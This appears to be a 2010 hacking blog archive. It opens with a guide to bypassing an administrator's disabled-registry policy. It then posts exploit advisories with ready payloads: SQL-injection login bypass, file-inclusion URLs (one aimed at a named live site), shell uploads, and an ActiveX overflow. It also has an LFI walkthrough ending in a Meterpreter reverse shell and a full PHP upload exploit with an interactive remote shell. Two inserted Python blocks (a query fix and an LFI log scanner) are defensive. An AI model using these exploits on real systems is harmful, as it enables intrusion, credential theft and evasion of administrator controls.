2010/12/13

Bypass Disabled Registry Editor (regedit)





How do you enable Registry Editing again if it has been disabled by your administrator?

Here I will share four methods to bypass it. Check this out.

First Method:

Click Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Set it to Not Configured.

Second Method:

Click Start -> Run. Type this command in Run box and press Ok.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0

Then a prompt will come up with this question: Value DisableRegistryTools exists, overwrite (Y/N)? Type yes and hit Enter.

After you have done that, also type this command in the Run box and hit Enter.
REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0

Then it will also come up with the question: Value DisableRegistryTools exists, overwrite (Y/N)? Type yes and hit Enter.

Third Method:

STEP 1. Disable as much as you can from your startup. Remove programs from your startup folder and so on, so as not to slow down the boot process.

STEP 2. Create a new shortcut on your desktop and point it to "C:\Windows\regedit.exe".

STEP 3. Log off, then log back on.

STEP 4. As soon as you see your desktop, double-click the shortcut. The system does not check for policies until a few seconds after it has booted up. If you click the icon fast enough, it should let you in. After you close it, though, it will not open again unless you redo steps 3 and 4.

Fourth Method:

Getting into the Registry Editor by making a VBS script in Notepad: open Notepad, copy the script below into it, and save it as regtool.vbs on your desktop. VBS script (select everything, copy it into Notepad and save it as regtool.vbs):

Option Explicit
'Declare variables
Dim WSHShell, rr, rr2, MyBox, val, val2, ttl, toggle
Dim jobfunc, itemtype
On Error Resume Next
Set WSHShell = WScript.CreateObject("WScript.Shell")
val = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
val2 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
itemtype = "REG_DWORD"
jobfunc = "Registry Editing Tools are now "
ttl = "Result"
'reads the registry key value.
rr = WSHShell.RegRead (val)
rr2 = WSHShell.RegRead (val2)
toggle=1
If (rr=1 or rr2=1) Then toggle=0
If toggle = 1 Then
WSHShell.RegWrite val, 1, itemtype
WSHShell.RegWrite val2, 1, itemtype
Mybox = MsgBox(jobfunc & "disabled.", 4096, ttl)
Else
WSHShell.RegDelete val
WSHShell.RegDelete val2
Mybox = MsgBox(jobfunc & "enabled.", 4096, ttl)
End If


Open regtool.vbs and there you go!

Note: This is written for educational purposes only; neither I nor the author will be responsible for any damage.

2010/12/01

Digitalus 1.10.0 Alpha2 Arbitrary File Upload vulnerability




########################################################
Digitalus 1.10.0 Alpha2 Arbitrary File Upload vulnerability
########################################################


[ASCII-art banner, by eidelweiss]


[+]Script: Digitalus
[+]Version: 1.10.0 Alpha2
[+]Vendor: http://digitaluscms.com/
[+]Download: http://digitalus-cms.googlecode.com/files/digitalus_1.10.0_alpha2.zip
########################################################

[!]Author : eidelweiss
[!]Contact: eidelweiss[at]windowslive[dot]com
[!]Blog: http://eidelweiss-advisories.blogspot.com
[!]Gratz : DealCyber member`s , yogyacarderlink crew , and YOU !!!

[!]Dork: "Powered By Digitalus cms"

Original Advisories:

http://eidelweiss-advisories.blogspot.com/2010/11/awcm-v22-auth-bypass-vulnerabilities.html

-=[Advisory timeline]=-

[-] 25 December 2010 (GMT+7) vulnerability found
[-] 25 December 2010 (GMT+7) vulnerability analysis and testing
[-] 26 December 2010 (GMT+7) vulnerability reported to vendor (first report, no response)
[-] 28 December 2010 (GMT+7) vulnerability reported to vendor (again, still no response)
[!] 01 December 2010 22:00 (GMT+7) vulnerability published

########################################################

-=[Description]=-

Digitalus CMS is a new kind of CMS. The focus of this open source project is usable software as opposed to endless lists of features.
We added a very flexible API to this base so you can customize virtually any aspect of the system.
This creates a simple and elegant platform that you can use for a wide range of sites and requirements.

########################################################

-=[Vuln Code]=-

path/scripts/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/media/' ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

With the default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code, because file names with multiple extensions are not properly checked.


########################################################

-=[ How To Exploit / P0C ]=-

1. An attacker might be able to upload arbitrary files containing malicious PHP code, because multiple file extensions are not properly checked, which leads to remote code execution.
2. An attacker can also exploit this vulnerability from a browser by following one of these links:

http://127.0.0.1/scripts/fckeditor/editor/filemanager/connectors/test.html

or

http://127.0.0.1/scripts/fckeditor/editor/filemanager/connectors/uploadtest.html

[*] Your file will be here:

http://127.0.0.1/media/yourfile.extension <= here

########################################################


| -=[MERRY CHRISTMAS AND HAPPY NEW YEARS , Nothing impossible in this world even nobody`s perfect]=- |

=========================| -=[ E0F ]=- |============================

2010/11/17

AWCM v2.2 Auth Bypass Vulnerabilities




########################################################
AWCM v2.2 Auth Bypass Vulnerabilities
########################################################




[+]Script: AWCM
[+]Version: 2.2 final
[+]Download: http://sourceforge.net/projects/awcm/files/AWCM%20v2.2/AWCM%20v2.2%20final.zip/download
########################################################

[!]Author : eidelweiss
[!]Contact: eidelweiss[at]windowslive[dot]com
[!]Blog: http://eidelweiss-advisories.blogspot.com
[!]Gratz : DealCyber member`s , yogyacarderlink crew , and YOU !!!

Original Advisories:


########################################################

-=[Description]=-

AR Web Content Manager (AWCM) is a free web content management system (CMS) built with PHP, MySQL, CSS and JavaScript that lets you manage your website easily and quickly.
It contains many main categories such as videos, topics, sounds and a photo gallery.

########################################################

-=[Vuln Code]=-


First, let's look at the code in the login.php file:

**********************************

include ("header.php");



$pusername = $_POST['username'];
$ppassword = md5($_POST['password']);
$premember = $_POST['remember'];

$mysql_login547_query = mysql_query("SELECT username,password,id FROM
awcm_members WHERE username = '$pusername' AND password = '$ppassword'");
$mysql_login547_total = mysql_num_rows($mysql_login547_query);
$mysql_login547_row = mysql_fetch_array($mysql_login547_query);
---------
**********************************

OK, now let's look at the code in the control/login.php file.
In this file I found the vulnerable code that an attacker or anonymous user can use to bypass the login section.
It is also possible to gain administrator access (if you are lucky, of course :D).

Here is the code from the control/login.php file:

**********************************
$page = 'login';
include ("common.php");

if(isset($_GET['do'])) {
$user = $_POST['username']; // <= i dont give fuck
$pass = md5($_POST['password']); //

$cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'");
$cp_login_total = mysql_num_rows($cp_login_query);

**********************************


########################################################

-=[ How To Exploit / P0C ]=-

Put this as the username: 'or 1=1/*
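The control/login.php admin check above, rebuilt as an added Python example (not AWCM's own code) on an in-memory SQLite table, to show why the quoted username returns rows and how binding the values instead of pasting them into the SQL text closes the hole; the awcm_members rows are constructed for the demo.

```python
"""The AWCM admin login check, vulnerable and fixed, on an in-memory SQLite
database.  Added example, not AWCM's code; the awcm_members rows are
constructed.  MD5 is kept only because that is what the application uses;
it is not a suitable password hash."""
import hashlib
import sqlite3


def md5_hex(password: str) -> str:
    """Same transformation as the PHP md5($_POST['password'])."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed awcm_members table: one admin and one ordinary member."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE awcm_members ("
               "id INTEGER PRIMARY KEY, username TEXT, password TEXT, level TEXT)")
    db.executemany(
        "INSERT INTO awcm_members (username, password, level) VALUES (?, ?, ?)",
        [("admin", md5_hex("correct-horse"), "admin"),
         ("bob", md5_hex("bob-pass"), "member")])
    db.commit()
    return db


def vulnerable_admin_login(db, username: str, password: str):
    """Mirrors control/login.php: $user and md5($pass) are pasted into the
    SQL text, so a quote inside the username ends the string literal and
    the rest of the input is parsed as SQL (the /* comments out the tail,
    and 'or 1=1' also defeats the level = 'admin' filter)."""
    sql = ("SELECT id,username,password,level FROM awcm_members "
           "WHERE level = 'admin' AND username = '%s' AND password = '%s'"
           % (username, md5_hex(password)))
    return db.execute(sql).fetchall()


def safe_admin_login(db, username: str, password: str):
    """Fix: bind the values as parameters.  They travel separately from the
    SQL text, so the same input is just a username that matches no row."""
    sql = ("SELECT id,username,password,level FROM awcm_members "
           "WHERE level = 'admin' AND username = ? AND password = ?")
    return db.execute(sql, (username, md5_hex(password))).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "'or 1=1/*"   # the advisory's username value
    print("vulnerable:   ", vulnerable_admin_login(db, payload, "x"))
    print("parameterized:", safe_admin_login(db, payload, "x"))
```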

=========================| -=[ E0F ]=- |============================

2010/10/21

New method and style: hacking a Windows server using LFI and a new type of backdoor (.exe)



Local File Inclusion attacks are among the most common vulnerabilities seen against web applications. Because they’re thought to be relatively benign, most organizations dismiss the large security risk they potentially create. In this paper I’ll present an attack against a site where the only known vulnerability is a web application that’s vulnerable to Local File Inclusion.

The host is a Windows system running XAMP to supply Apache, MySQL and PHP. The site is running the Joomla! web application and has a single vulnerable plugin installed: com_ganalytics. This is the Google Analytics plugin used by Joomla site operators to track site usage.

The vulnerable piece of code that makes LFI possible is found in the ganalytics.php file. It’s the following:

if($controller = JRequest::getVar('controller')) {
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}

The 'controller' parameter accepts the path passed to it without any verification. This small mistake allows an attacker to traverse the entire file system.

I was able to use this code in the following manner to read files on the local machine.

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\boot.ini%00

This returned the following in my browser…

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

Nice…

After a bit of research about the Joomla database layout, I learned that the jos_users table is the one that contains the user information. Everything from the password hashes and salts to user email addresses are kept in that table.

Using the same directory traversal used earlier, we’ll attempt to read the MySQL data file containing user credentials using the following:

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00

with the following result…

þ>��� Administrator admin administrator@localhost-db.comA115def1b208327f20d85b65aa7dc2440:UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I Super Administrator 9²þG ��ìnH H ���m�admin_language=language= editor= helpsite= timezone=0 ��

The important part of the above output is the hash and salt pair, repeated below: the Joomla site administrator's password hash and salt, separated by a colon.

hash=115def1b208327f20d85b65aa7dc2440
salt=UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I

After a bit of research at the following site, http://forum.joomla.org/viewtopic.php?f=432&t=207689, we learn how the Joomla password hash is calculated.

It is an MD5 digest of the cleartext password concatenated with the salt (md5(password + salt)).

With this knowledge the easiest way into the administrative interface is probably to brute force the administrator password.

We navigate to the administrator account settings page and start looking for a location to inject the following PHP code, which would allow us to execute commands on the local system.



We use the Tamper Data Firefox plugin to inject the PHP base64 decode shell into the 'language' field.

At this point we now have the ability to run commands on the system. The process of doing so involves the following:

* base64 encoding our command
* injecting the base64 encoded text into the 'cmd' parameter
* running the command by calling the base64 decoder shell that we injected into the database.

So let's give it a shot. We'll base64 encode the "dir" command:

http://localhost/joomla/index.php?option=com_ganalytics&cmd=ZGlyCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD

with the following result:

(sorry hidden for Privacy)


Nice. The next step is to get something a bit more ‘potent’ on the system so that we get shell access.

We’re going to make use of PHP’s $_FILES variable to create a file uploader that we can use to put our payload on the local file system.

root@bt:~/ctp/traversal/joomla# cat upload.php

$upload="echo \"\" > d.php";
$output=base64_encode($upload);
echo $output;
?>

OK, now we try to pop the shell:

root@bt:~/ctp/traversal/joomla# echo shell.exe | base64
c2hlbGwuZXhlCg==
root@bt:~/ctp/traversal/joomla#

http://localhost/joomla/index.php?option=com_ganalytics&cmd=c2hlbGwuZXhlCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00


Meanwhile on the attacking machine…

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.77.236:443
[*] Starting the payload handler…
[*] Sending stage (748032 bytes) to 172.16.77.246
[*] Meterpreter session 2 opened (172.16.77.236:443 -> 172.16.77.246:1682)

meterpreter > getuid
Server username: JOOMLA\Administrator
meterpreter > shell
Process 2640 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xamp\htdocs\joomla>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : example.com
IP Address. . . . . . . . . . . . : 172.16.77.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.77.8

C:\xamp\htdocs>

Game Over..!!!


At this point an attacker can use this machine as a pivot to attack other machines within the network, install trojans, place rogue code on the web server, and so on. The only limit is how creative they are. So the next time you run that vulnerability scanner against your web application farm, don't be so quick to dismiss the potential damage of the RFI/LFI results.
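Two defender-side pieces for the LFI pattern in this post, as an added Python example that is not Joomla's or the com_ganalytics plugin's code: a strict validator for the 'controller' parameter (what the require_once line should have demanded before building a path) and a scanner that flags the traversal and null-byte requests from this post in access log lines; the log lines are constructed in Apache combined format from the URLs above, and the scanner also catches the absolute-path style of LFI (page=/etc/passwd) from the CuteNews advisory on this page.

```python
"""Validator for a Joomla-style controller parameter plus an access-log
scanner for local-file-inclusion indicators.  Added example, not Joomla's or
the plugin's code; SAMPLE_LOG is constructed from the URLs in the post."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# A legitimate controller is a bare identifier: no separators, no dots, no
# NUL.  Assumption: the component's controllers are PHP files named this way.
CONTROLLER_RE = re.compile(r"\A[A-Za-z][A-Za-z0-9_]{0,63}\Z")


def is_safe_controller(value: str) -> bool:
    """Reject anything that is not a plain identifier instead of concatenating
    it into a file path."""
    return CONTROLLER_RE.match(value) is not None


# Checked after URL decoding: '..' followed by either slash (the post uses
# backslashes against Windows), a NUL byte (used in the PoC to cut off the
# appended '.php' on PHP versions that accepted NUL in paths), or an
# absolute Unix/Windows path.
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")
ABSOLUTE_RE = re.compile(r"\A(?:[A-Za-z]:[\\/]|[\\/])")


def suspicious_param_values(request_target: str):
    """Return (parameter, reason) pairs for query values that look like
    file-inclusion attempts."""
    hits = []
    query = urlsplit(request_target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)   # second pass catches %2500-style double encoding
            if "\x00" in value:
                hits.append((name, "null byte"))
            if TRAVERSAL_RE.search(value):
                hits.append((name, "directory traversal"))
            elif ABSOLUTE_RE.match(value):
                hits.append((name, "absolute path"))
    return hits


# Apache combined log format; only the fields the scanner needs are named.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def scan_access_log(lines):
    """Return (client ip, request target, hits) for every line with indicators."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        hits = suspicious_param_values(match.group("target"))
        if hits:
            findings.append((match.group("ip"), match.group("target"), hits))
    return findings


# Constructed sample log lines: addresses and timestamps are made up, the
# request targets follow the URLs in the post and the CuteNews page= advisory.
SAMPLE_LOG = [
    r'172.16.77.236 - - [21/Oct/2010:10:01:12 +0700] "GET /joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\boot.ini%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'172.16.77.236 - - [21/Oct/2010:10:02:40 +0700] "GET /joomla/index.php?option=com_ganalytics&cmd=ZGlyCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    r'10.0.0.5 - - [21/Oct/2010:10:03:01 +0700] "GET /joomla/index.php?option=com_ganalytics&controller=ganalytics HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    r'10.0.0.6 - - [21/Oct/2010:10:04:15 +0700] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1024 "-" "curl/7.21"',
]

if __name__ == "__main__":
    for ip, target, hits in scan_access_log(SAMPLE_LOG):
        print(ip, target, hits)
```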

2010/10/05

CuteNews (page) local File Inclusion Vulnerability



==================================================
CuteNews (page) local File Inclusion Vulnerability
==================================================

[Inj3ct0r ASCII-art banner: Inj3ct0r.com, exploit database separated by exploit type (local, remote, DoS, etc.); Site: Inj3ct0r.com; Support e-mail: submit[at]inj3ct0r.com; "I'm eidelweiss, member of the Inj3ct0r Team"]


vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

-=[p0c]=-

http://127.0.0.1/index.php?page= [lfi]
or
http://127.0.0.1/path/index.php?page=/etc/passwd

-=[Demo p0c]=-

http://www.christyle.org/index.php?page=/etc/passwd

=========================| -=[ E0F ]=- |============================

2010/09/08

Internet Download Accelerator 5.8 Remote Buffer Overflow PoC

==================================================================
Internet Explorer ver 7.0.5730.13
Tested on Windows SP2
Inj3ct0r team & yogyacarderlink team
Bug discovered by eidelweiss
Affected Software: idaiehlp.dll BHO: IE 4.x-6.x BHO for Internet Download Accelerator - {2A646672-9C3A-4C28-9A7A-1FB0F63F28B6}
DLL VER : 2.4.1.110
program ver : 5.8.3.1221
download link : http://download1.westbyte.com/ida/idasetup.exe
Vendor: www.westbyte.com
www.inj3ct0r.com
www.yogyacarderlink.web.id
==================================================================
<html>
<object classid="clsid:2A646672-9C3A-4C28-9A7A-1FB0F63F28B6" id="idaiehlp"></object>
<script language="vbscript">
arg1=String(9696969, "A") + String(999999, unescape("%960"))
idaiehlp.NotSafe (arg1)
</script>
</html>

2010/08/27

pecio CMS v2.0.5 (template) Multiple Remote File Include Vulnerability

================================================================
pecio CMS v2.0.5 (template) Multiple Remote File Include Vulnerability
================================================================



Software Link: http://pecio-cms.com/
Download: http://pecio-cms.com/pec_upload/files/pecio-2.0.5.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

Greetz: Inj3ct0r.com (Inj3ct0r Exploit DataBase), YOGYACARDERLINK, and all Indonesian Hacking Community.
Special Thank`s To: iwe a.k.a KirD , PKI a.k.a Andri klaten, m4rc0 (Thx so much,you know why and i`ll never forget you all)

================================================================

Pecio is a content management system written in PHP with the intention to be a small, simple and lightweight cms for people who want to create websites including old-style information and new-style blog part.
It doesn't mainly focus on ease of use and full featured user experience but rather on being a flexible and lightweight content editing solution for web masters.

================================================================

-=[ Vuln c0de ]=-

<?php include('pec_templates/' . $pecio->get('template')->get_directory_name() . '/header.php'); ?>

<?php include('pec_templates/' . $pecio->get('template')->get_directory_name() . '/footer.php'); ?>

================================================================

-=[ p0c ]=-

http://sample.site/pecio_path/pec_templates/nova-blue/post.php?template= [inj3ct0r sh3ll]
http://sample.site/pecio_path/pec_templates/nova-blue/article.php?template= [inj3ct0r sh3ll]
http://sample.site/pecio_path/pec_templates/nova-blue/blog.php?template= [inj3ct0r sh3ll]
http://sample.site/pecio_path/pec_templates/nova-blue/home.php?template= [inj3ct0r sh3ll]

================================================================

Nb:
Script kiddies, please learn more about RFI vulnerabilities; it's not just about include and require.
If you just want a name or to exist, so that people call you a hacker after you post or publish shit exploits, that's the wrong way, I think!!!

=========================| =[Hacking Is Art]=- |======================

2010/08/25

Ananta Gazelle CMS Shell Upload Vulnerability




==========================================================
Ananta Gazelle CMS Shell Upload Vulnerability
==========================================================



Software Link: www.anantasoft.com
Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

Special Thank`s To: iwe a.k.a KirD , PKI a.k.a Andri klaten, m4rc0, and YOU !!!!!

================================================================

This vulnerability can be exploited by an attacker to upload an arbitrary shell script to gain access
or data.

1. You need to register an account.
2. When your account is active (registered), after activating it by clicking the link in your mail,
log in by typing your user name and password.
3. After a successful login, click "To admin panel" or "To user panel", and/or you will be directed to

http://sample.site/ananta_path/admin
or
http://sample.site/ananta-path/user.php

4. Then go to, or copy and paste, this link:

"/admin/editor/filemanager/frmupload.html" // (without quotes)

ex: http://sample.site/admin/editor/filemanager/frmupload.html

5. Upload your backdoor shell script there.
6. If successful (or lucky), your backdoor shell can be checked or will be available here:

http://sample.site/admin/editor/backdoorshellfile.extention (Ananta_Gazelle1.0/admin/editor/filemanager/connectors/php/config.php //line 27)

or

http://sample.site/user/backdoorshellfile.extention (Ananta_Gazelle1.0/admin/editor/filemanager/connectors/php/config.php //line 27)


NOTE: Edit your backdoor shell by adding GIF or JPG source to it, so you can get the shell.


=========================| -=[ E0F ]=- |============================

2010/08/06

ccTiddly v1.7.6 Multiple Remote File Include Vulnerability





================================================================
ccTiddly v1.7.6 Multiple Remote File Include Vulnerability
================================================================



Developer: http://tiddlywiki.org/wiki/CcTiddlyDeveloper
Download: http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.6.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

================================================================

ccTiddly is a collaborative server side version of TiddlyWiki.

Note:
This is the same vulnerability as in an older version (http://www.exploit-db.com/exploits/7336/).
The vendor did not fix the vulnerability in all folders!!!

================================================================

-=[Vuln C0de]=-

[!] path/includes/include.php

include_once($cct_base."includes/ccAssignments.php");

[!] path/includes/workspace.php

include_once($cct_base."includes/header.php");
include_once($cct_base."includes/user.php");
include_once($cct_base."includes/tiddler.php");

================================================================

-=[P0C]=-

http://127.0.0.1/path/includes/include.php?cct_base= [inj3ct0r sh3ll]

http://127.0.0.1/path/includes/workspace.php?cct_base= [inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |============================

2010/08/03

68KB v1.0.0rc4 Remote File Include Vulnerability




====================================================
68KB v1.0.0rc4 Remote File Include Vulnerability
====================================================




Vendor: http://68kb.com
download: http://github.com/68designs/68KB/downloads
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

Description:

68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.

Note:
This is the same vulnerability as in an older version (http://www.exploit-db.com/exploits/11904/).
The vendor did not fix the vulnerability in all files and directories!!!

=====================================================================

-=[ vuln c0de ]=-

[!] path/themes/admin/default/modules/show.php





=====================================================================

-=[ P0C ]=-

http://127.0.0.1/path/themes/admin/default/modules/show.php?file= [inj3ct0r shell]



=========================| -=[ E0F ]=- |=================================

2010/07/24

DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit




/*
-----------------------------------------------------------------
DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------


Vendor: www.dutchmonkey.com
Download : http://www.dutchmonkey.com/?file=downloads.html&label=Downloads
exploited by ..: eidelweiss
Affected: version 3.9.11
details..: works with an Apache server with the mod_mime module installed (if specific)

[-] vulnerable code in /path/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/userfiles/' ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

With the default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code, because file names with multiple extensions are not properly checked.
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;

$connector = "/fckeditor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");

foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";

$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "\r\n";
$data .= "--abcdef--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");

$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;

sleep(1);
}

return false;
}
print "\n+--------------------------------------------------------------------------+";
print "\n| DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit |";
print "\n+--------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /dm-filemanager/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\dm-filemanager-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>

2010/06/04

DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability




1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
